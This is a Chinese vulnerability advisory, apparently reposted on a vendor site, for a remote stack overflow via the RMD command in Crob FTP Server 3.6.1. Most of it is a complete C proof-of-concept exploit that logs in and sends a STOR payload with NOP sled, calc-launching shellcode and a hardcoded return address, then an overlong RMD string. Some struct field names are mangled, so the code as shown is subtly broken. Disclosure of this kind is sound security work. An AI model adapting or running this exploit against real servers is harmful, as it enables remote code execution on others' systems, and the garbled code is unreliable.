发布时间:2019-04-03 17:34:39阅读:来源:锐码试验机
资讯CrobFTPServer远程RMD命令栈溢出漏洞

Crob FTP Server远程RMD命令栈溢出漏洞受影响系统: Crob Crob FTP Server 3.6.1描述: BUGTRAQID: 13847Crob Ftp Server是一款简单易用的FTP服务程序。Crob FTP Server在处理客户端请求时存在缓冲区溢出漏洞。如果攻击者能够向任意FTP命令(例如STOR)提供超长参数然后以很长的参数调用RMD命令的话,就可以触发栈溢出。成功利用这个漏洞的攻击者可在服务器上以执行代码。<*来源:Leon Juranic ([email protected])链接:测试方法: 警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!/** CrobFTP remote stack overflow PoC * ---------------------------------* Tested on Crob FTP Server 3.6.1, Windows XP* * Coded by Leon Juranic <[email protected]>* LSS Security / **/#include <stdio.h>#include <windows.h>#include <time.h>#pragma comment (lib,"ws2_32")char *fzz_recv (int sock){fd_set fds;struct timeval tv;static char buf[10000];char *ptr=buf;int n;_sec = 5;_usec = 0;FD_ZERO(&fds);FD_SET(sock,&fds);if (select(NULL,&fds,NULL,NULL,&tv) != 0) {if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);buf[n-1] = '\0';printf ("RECV: %s\n",buf);return buf;}else {return NULL;}}int login (int sock, char *user, char *pass){char buf[1024], *bla;bla=fzz_recv(sock);printf ("recv: %s\n",bla);sprintf (buf,"USER %s\r\n",user);send (sock,buf,strlen(buf),0);bla=fzz_recv(sock);printf ("recv: %s\n",bla);sprintf (buf,"PASS %s\r\n",pass);send (sock,buf,strlen(buf),0);bla=fzz_recv(sock);printf ("recv: %s\n",bla);if (strcmp("230",bla) != NULL)return 0;else return -1;return 0;}void lame_sploit (char *pack, char *user, char *pass){WORD wVersionRequested;WSADATA wsaData;int sock, err,x;struct sockaddr_in sin;char buf[2000],tmp[1000];char *shell=// 5 min. 
XP SP1 shellcode"\x33\xc0"// xor eax,eax"\x50"// push eax (\0)"\x68\x2e\x65\x78\x65"// push '.exe'"\x68\x63\x61\x6c\x63"// push 'calc'"\x54"// push esp"\xba\x44\x80\xc2\x77"// movedx, 77c28044"\xff\xd2";// call edx(system)wVersionRequested = MAKEWORD( 2, 2 );err = WSAStartup( wVersionRequested, &wsaData );if ( err != 0 ) {printf ("ERROR: Sorry, cannot create socket!!!\n");ExitProcess(-1);}sock=socket(AF_INET,SOCK_STREAM,0);n_family=AF_INET;n_addr.s_addr = inet_addr(pack);n_port = htons(21);if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {printf ("CONNECT :(((\n");ExitProcess(-1);}if (login(sock,user,pass) == -1){printf ("ERROR: Cannot login to FTP server, sorry!!!\n");exit(-1);}memset(tmp,0,sizeof(tmp));memset (tmp,0x90,180);memcpy (&tmp[80],shell,strlen(shell));*(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'*(long*)&tmp[166] = 0x74ec8390; //sub esp,0x74*(long*)&tmp[170] = 0x9090e4ff; //jmp esp_snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp);printf ("DEBUG: %.30s %d\n",buf,strlen(buf));send (sock,buf,strlen(buf),0);printf ("%s\n",fzz_recv(sock));strcpy(buf,"RMD ");for (x=0;x<276;x++)strcat (buf,".../");strcat(buf,"\r\n");printf ("Sending exploit strings\n");send (sock,buf,strlen(buf),0);printf ("recv: %s\n",fzz_recv(sock));}main (int argc, char **argv){printf ("CrobFTP Stack overflow PoC \n""Coded by Leon Juranic <[email protected]>\n""LSS Security / ");if (argc < 4 ) {printf ("\nusage: %s <target_IP> <user> <pass>\n",argv[0]);exit(-1);}lame_sploit(argv[1],argv[2],argv[3]);}建议: 厂商补丁:Crob----目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
